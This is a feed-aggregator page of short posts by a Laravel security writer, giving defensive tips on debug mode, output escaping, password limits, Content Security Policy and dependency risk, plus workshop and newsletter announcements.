Quantcast
Channel: Stephen Rees-Carter :laravel:
Browsing latest articles
Browse All 424 View Live

Article 0

I'll be diving into this in my next Security Tip over at https://securinglaravel.com, sign up so you don't miss it. This is a *really* fun one. 😈

View Article


Article 3

Had a wide range of responses to my code question (https://phpc.social/@valorin/113999349390860081), and unsurprisingly a lot of folks aren't fully aware of how PHP handles precedence, and why brackets...

View Article


Article 2

I've had a few "ad companies" reach out about ads/sponsorships on Securing Laravel, so let me be clear: I'm not interested in a third-party managing any content on SL.But it got me thinking, are there...

View Article

Article 1

The more dependencies your project has, the higher your risk of supply-chain attack is, and the less you're aware of what code is actually running. My recommendation: Replace simple dependencies with...

View Article

Article 0

Delivering XSS payloads via User Agent strings. 😈

View Article


Article 1

These are my top 3 tips for getting started with a Content Security Policy - as proven by a friend who went from failing security scans to passing with flying...

View Article

Article 0

Running my first "Let's Hack!" Laravel workshop for an awesome Aussie team tomorrow! 🎉It's based around "Th1nk Lik3 a H4cker", but I've added more challenges and twists, so even if they've studied,...

View Article

Article 0

I probably won't be online much this week, we were supposed to be travelling for a family funeral, but instead we're preparing the house for incoming Cyclone Alfred! 😧It's not on a direct course, but...

View Article


Article 4

It's been a week, so a quick update: We managed to avoid any damage or loss of power/internet during the cyclone, but the prep work and kids at home meant I didn't get any work time, so I missed last...

View Article


Article 3

Laravel 12 gives us the ability to reject passwords longer than 72 bytes for bcrypt, but you need to turn it on manually. Oh, and don't forget to add a validation rule, or you'll be throwing suspicious...

View Article

Article 2

Ok folks, repeat after me: Do not turn on debug mode in production!Do not turn on debug mode in production!Do not turn on debug mode in production!Do not turn on debug mode in production!Do not turn on...

View Article

Article 1

Ok, fine. This is actually XSS and not specifically related to debug mode. 🤷Therefore... Repeat after me:Escape your outputs!Escape your outputs!Escape your outputs!Escape your outputs!

View Article

Article 0

Long overdue, but I finally tagged v1.0 of valorin/random! 🎉The only significant change is removing string support in pick(), and returning the same type. The rest is pretty stable, and works from PHP...

View Article


Article 1

This is gonna be a fun one! 🤓 If you have any security questions about the new Laravel Starter Kits, let me know and I'll try to fit it in!

View Article

Article 0

Unexpected benefit of Laravel Cloud - spinning up test apps for vulnerability scanning. 😈

View Article


Article 0

Sorry folks, I'll have to delay my In Depth on the Starter Kits until next week. I'm 4k words deep into it so far (and somehow only covered the first?! 😲) but a few things outside my control mean I...

View Article

Article 1

Laravel 12 introduced a seemingly minor change: image validation now excludes SVGs by default. 🤔 Let's take a look at why this is so important!...

View Article


Article 0

I don't normally post JS stuff, but CVE-2025-29927 is a whole lot of fun!"it was possible to skip running Middleware, which could allow requests to skip critical checks—such as authorization cookie...

View Article

Article 1

Temporary URLs for file access is an essential piece of the security puzzle, which up until "recently" were only available out-of-the-box for the S3 driver in Laravel. Now you can easily generate them...

View Article

Article 0

Proud pentester moment: One of my clients just hit me with a @ThinkstCanary Canary Token! 🤩🐷🔑

View Article
Browsing latest articles
Browse All 424 View Live